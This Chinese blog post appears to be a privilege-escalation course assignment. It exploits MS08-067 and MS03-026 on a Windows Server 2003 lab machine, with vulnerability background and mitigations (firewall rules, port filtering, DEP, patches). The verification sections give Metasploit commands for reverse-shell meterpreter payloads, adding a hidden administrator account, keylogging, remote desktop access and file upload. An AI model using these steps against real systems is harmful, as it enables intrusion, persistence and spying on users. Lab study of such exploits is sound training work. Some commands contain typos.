博客

课程名称：《系统提权》

【要求】

1. 对Windows Server2003操作系统MS08_067、MS03_026漏洞进行提权渗透测试；
2. 对MS03_026漏洞开启远程桌面服务；
3. 操作过程可自由发挥；
4. 概念越详细越好；
5. 渗透和验证过程必要有截图和文字说明；
6. 其余部分均可配文字简介叙述；
7. 作业模板在此基础上可以自由发挥设计；
8. 熟悉虚拟机的使用，了解渗透测试工具的使用方法和Linux、DOS命令

• 
  测试对象
  

二、测试工具

三、被测设备信息情况

1.基本信息

2.端口开放情况

【漏洞名称】

MS08_067

【漏洞描述】

MS08-067


漏洞将会影响除


Windows



Server



2008 Core


以外的所有


Windows


系统，包括：


Windows 2000/XP/Server 2003/Vista/Server 2008


的各个版本，甚至还包括测试阶段的


Windows 7 Pro



–



Beta


。

发布日期：


2008/10/22

下载大小：因操作系统而异

说明：微软安全公告



KB958644

漏洞影响：服务器服务中的漏洞可能允许远程执行代码

发布日期：


2008/10/22

下载大小：因操作系统而异。

受影响的操作系统：


Windows 2000;XP;Server 2003;



Vista



;Server 2008;7 Beta

此安全更新解决了服务器服务中一个秘密报告的漏洞。


如果用户在受影响的系统上收到特制的


RPC


请求，则该漏洞可能允许远程执行代码。


在


Microsoft Windows 2000


、


Windows XP


和


Windows Server 2003


系统上，攻击者可能未经




身份验证




即可利用此漏洞运行任意代码。


此漏洞可能用于进行



蠕虫



攻击。



防火墙



最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。可以通过安装本


Microsoft


更新程序来保护计算机不受侵害。安装后，可能必须重新启动计算机。

严重等级：


Windows 2000;XP;Server 2003


为严重，


Windows Vista;Server 2008;7 Beta


为重要

【解决措施】

MS08-067


漏洞的终端用户解决方案



这是一个针对


139


、


445


端口的


RPC


服务进行


***


的漏洞，可以直接获取系统控制权。根据微软的消息，该


***


无法穿透


DEP


机制的保护，对正版用户，该漏洞对


XPSP2


以上版本（含


SP2


）和


Server2003SP1


（含


SP1


）系统无效，因此主要受到威胁的用户应该是


Windows2000


和


WindowsXPSP2


以前版本用户。但由于一些盗版传播中，被人为降低了安全级别或者修改过安全机制，因此除了上述版本的用户也有可能受到


***


。



据安天介绍，一些常规的解决思路是，当有重大远程漏洞发生时，对于不需要实时连接的系统，可以考虑先断网检测安全配置，然后采用调整防火墙和安全策略的方式保证联网打补丁时段的安全，然后再进行补丁升级。



一、桌面与工作站用户的安全配置方案



桌面系统主要以浏览、下载、游戏、工作等与用户直接操作交互为主要应用方式，其多数网络操作为用户主动对外发起连接，而不是凭借本地监听端口为外部用户提供服务。桌面系统如果不提供共享打印，不需要在局域网游戏（如


CS


、


FIFA


等）中作为主机使用，可以通过设置为禁止发布发起连接模式，来阻断所有向本主机发起的连接。进行有关设置不会影响到操作者的浏览、聊天、下载、在线视频、常见网游等操作。



进行这样的设置不仅可以阻断


MS08-067***


，而且可以阻断所有相同针对主机固定端口的


***


，缺点是如果主机提供打印共享、网络共享目录等服务则会失效，在


CS


、


FIFA


等游戏中无法作为


host


主机使用，还可能与蓝波宽带拨号程序冲突。



1


、


Windows


自带防火墙的相关配置



步骤


1


：在控制面板中找到防火墙。

步骤


2


：选择更改设置，此时


Vista


系统的安全机制可能需要灰屏确认，请选择是。

步骤


3


：启动防火墙并选择阻止所有传入连接。

2


、其它防火墙的安全设置



如果


Windows


系统的防火墙不支持本项设置，可通过其他防火墙实现，以安天盾防火墙免费工具为例。



步骤


1


：通过单击


Windows


开始菜单中安天安全中心项目，或者单击托盘中的安天安全中心图标，启动有关配置。

步骤


2


：在安天安全中心界面上点击设置


,


进行漏洞补丁的调试。

步骤


3


：将策略选择为系统初装。

二、不需要开放


RPC


服务的服务器安全配置方案



网络服务器用户以固定端口对外进行服务，因此不能采用阻断所有传入连接的方式进行配置，否则会失效。而从


WindowNTServer


到


Server2008


，不需要开放


RPC


服务器的用户可以不依赖任何安全工具，仅凭借


WindowsServer


自身安全机制既可实现屏蔽，如果仅是直接关闭


RPC


服务，会给本机管理带来一些麻烦。



步骤


1


：点击右键，选择网络连接属性。

步骤


2


：点击


Internet


协议（


TCP/IP


）属性。

步骤


3


：在弹出的


Internet


协议（


TCP/IP


）属性对话框中点击


“


高级


”


。

步骤


4


：对


TCP/IP


筛选中点击属性。

步骤


5


：在


TCP/IP


筛选中配置允许访问的端口，只要不包含


TCP139


和


445


则


MS08-067RPC***


失效。

三、需要开放


RPC


服务的服务器安全配置方案



需要开放


RPC


服务的服务器，如网络打印、网络共享和一些


RPC


通讯调用的节点，不能够通过上述关闭端口的方式，否则会造成无效。可以转而采用打补丁、打开


DEP


策略，或安装主机


IPS


的方法。下面介绍一下系统


DEP


保护配置的方法。



步骤


1


：我的电脑右键点击属性，点击


“


高级


”


页中的


“


设置


”


按钮。

步骤


2


：设定数据执行保护策略，修改后重新启动电脑。

在这里，进行不同的选择会有不同的效果，如果选择


“


仅为基本


Windows


程序和服务启用


DEP”


功能，则可以挡住本次


RPC***


，也可以挡住目前主流的针对


Windows


开放端口的


***


。在获得一定的安全性的情况下，保证系统的兼容性。但是缺点是不能保护类似


IE


浏览器、


Outlook


等比较脆弱的互联网应用程序，不能防范类似挂马注入的


***


。



如果选择


“


为除下列选定程序之外的所有程序和服务启用


DEP”


功能，则在上述效果的基础上，对


Web


挂马、各种应用软件插件注入都有很好的效果，具有更强的系统安全性，不过缺点是与部分应用程序冲突，但可以通过将冲突的程序设置为例外来解决。



四、安装相应补丁，解决安全隐患



根据自己系统情况寻找地址安装单一补丁，是一个有效修补漏洞并规避微软黑屏策略影响的方法。



微软的补丁都可以离线安装，可以选择将有漏洞的系统断网，从安全的系统上下载补丁再用移动存储复制到有漏洞的系统下。

【漏洞验证】

1. 
   打开msfconsole
   

指令:mafconsole

1. 
   搜索ms08_067
   

指令:search ms08_067

3


使用ma08_067_netapi

指令:use exploit/windows/smb/ms08_067_netapi

4.


查看攻击载荷

指令


:Show payloads

5.


设置


windows/meterpreter/reverse_tcp


载荷

指令


:


set payload windows/meterpreter/reverse_tcp

6.


查看需要配置的参数

指令


: show options

7.


设置参数

Lhost为攻击方ip,rhost为被攻击方ip,target为目标主机名称

指令: set lhost 10.10.10.130

set rhost 10.10.10.131

set target 3

8.发动攻击

指令:exploit

9.进入shell创建用户

指令:shell

net user hgc 123 /add

10.设置为超级用户

指令: net localgroup administrators hgc /add

11.对目标主机屏幕截取

1. 键盘记录

指令: keysscan_start

keyscan_dump

keyscan_stop

13.创建文件

指令:mkdir hgc

【漏洞名称】

MS03_026

【漏洞描述】

1


、


Remote Procedure Call (RPC)


是


Windows


操作系统使用的一种远程过程调用协议，


RPC


提供进程间交互通信机制，允许在某台计算机上运行程序的无缝地在远程系统上执行代码。协议本身源自开放软件基


金会的


RPC


协议，


Microsoft


在其基础上增加了自己的一些扩展。

eEye


的研究人员发现，由于


Windows RPC DCOM


接口对报文的长度域缺乏检查导致发生基于堆的溢出，远程


***


者可以利用这些漏洞以本地系统权限在系统上执行任意指令。

漏洞实质上影响的是使用


RPC


的


DCOM


接口，此接口处理由客户端机器发送给服务器的


DCOM


对象激活请求


(


如


UNC


路径


)


。


***


者通过向目标发送畸形


RPC DCOM


请求来利用这些漏洞。成功利用此漏洞可以以本地系统权限执行任意指令。


***


者可以在系统上执行任意操作


，如安装程序、查看或更改、删除数据或创建系统管理员权限的帐户。

使用者可以通过


135(UDP/TCP)


、


137/UDP


、


138/UDP


、


139/TCP


、


445(UDP/TCP)


、


593/TCP


端口进行攻击。对于启动了


COM  Internet


服务和


RPC over HTTP


的用户来说，还可能通过


80/TCP


和


443/TCP


端口进行


***


。

2


、


Microsoft DCOM  RPC


相关系统漏洞


,


具体内容即为


MS03-026


和


MS03-039.


正因为此


,


造成


Blaster.Worm(


冲击波


).


以及


w32.Nachi.Worm(


冲击波杀手


)


蠕虫病毒在校园网络中的泛滥


.


而且


DCOM RPC


漏洞的


remote root  ,


可以让一个不具备任何基础知识的攻击者


,


在


2


分钟之内进入到你的计算机系统中


,


他所做的仅仅是从网上下载一个简单的攻击工具和一个扫描工具就可以了


.

查找


ms03-026


系统漏洞的利用：

msf>search ms03_026

显示找到的


ms03-026


的路径

msf>use exploit/windows/…/ms03_026_dcom

进入后可以输入

msf exploit(ms03_026_dcom) > show options

来查看所需要输入的参数

msf exploit(ms03_026_dcom) > show payloads

显示当前模块的所有攻击载荷。攻击载荷是我们希望在目标系统被渗透后去执行的代码。

msf exploit(ms03_026_dcom) > set PAYLOAD generic/shell_reverse_tcp

选择一个反弹式的


shell

msf exploit(ms03_026_dcom) > set RHOST 192.168.250.157

msf exploit(ms03_026_dcom) > set LHOST 192.168.250.135

输入靶机地址和攻击机的地址

msf exploit(ms03_026_dcom) > exploit

开始进行渗透攻击

【解决措施】

解决方法


:


首先，打开“管理工具”→“服务”管理器，在服务管理器的主窗口服务列表中，找到名称为“


Cryptographic Services


”的服务项，双击该服务项，在弹出的该服务项属性对话框中，单击“停止”按钮，停止该服务。然后，在资源管理器中，打开系统安装目录


\\



System32



\\


文件夹，在该文件夹下，找到名为“


catroot2


”的文件夹，将其删除或重命名。最后在服务管理器中，将“


Cryptographic Services


”服务启动，并安装系统漏洞补丁，一般就可以正常安装



系统补丁



了

通过命令行的方法来解决


:1


、在开始中运行


cmd


，


2


、在窗口中运行


net stop cryptsvc


，回车，


3


、


ren %systemroot%\



system32



\catroot2 oldcatroot2


，回车，


4


、


net start cryptsvc


，回车，


5


、


exit


，回车。然后就可以了

其实其实现过程是一样的。把


Cryptographic Services


这个服务给修复好就可以了。



某些


XP


用户在安装


MS03-026


补丁出现提示“安装程序不能验证


update.inf


完整性，请确定加密服务正在此计算机上运行”，点击确定后就退出。

即使在命令行提示符下输入



net start cryptographic service

1


、在开始中运行


cmd

2


、在窗口中运行


net stop cryptsvc


，



3


、


ren %systemroot%\



system32



\catroot2 oldcatroot2


，



4


、


net start cryptsvc


，

【漏洞验证】

1. 
   打开msfconsole
   

指令:msfconsole

1. 
   查找MS03_026
   

指令search MS03_026

3.


执行该文件

指令:


use exploit/windows/dcerpc/ms03_026_dcom

4.


查看攻击载荷

指令:show payload

5.


设置攻击载荷

指令:


set payload windows/meterpreter/reverse_tcp

6.


查看需要设置的参数

指令:


show options

7.


设置参数

Lhost为攻击方ip,rhost为被攻击方ip,target为目标主机名称

指令: set lhost 10.10.10.130

set rhost 10.10.10.131

set target  0

8.


开始运行

1. 
   创建用户
   

指令:


net user hgc2 123 /add

1. 
   添加为系统管理员
   

指令:


net localgroup administrators hgc2 /add

11.


远程桌面登录

成功连接远程主机

新建文件夹

返回虚拟机查看

可以看到文件夹成功出现,这表明系统管理员账户创建成功,远程主机连接成功

12.


上传文件

指令:upload /root/user.txt

返回windows 2003查看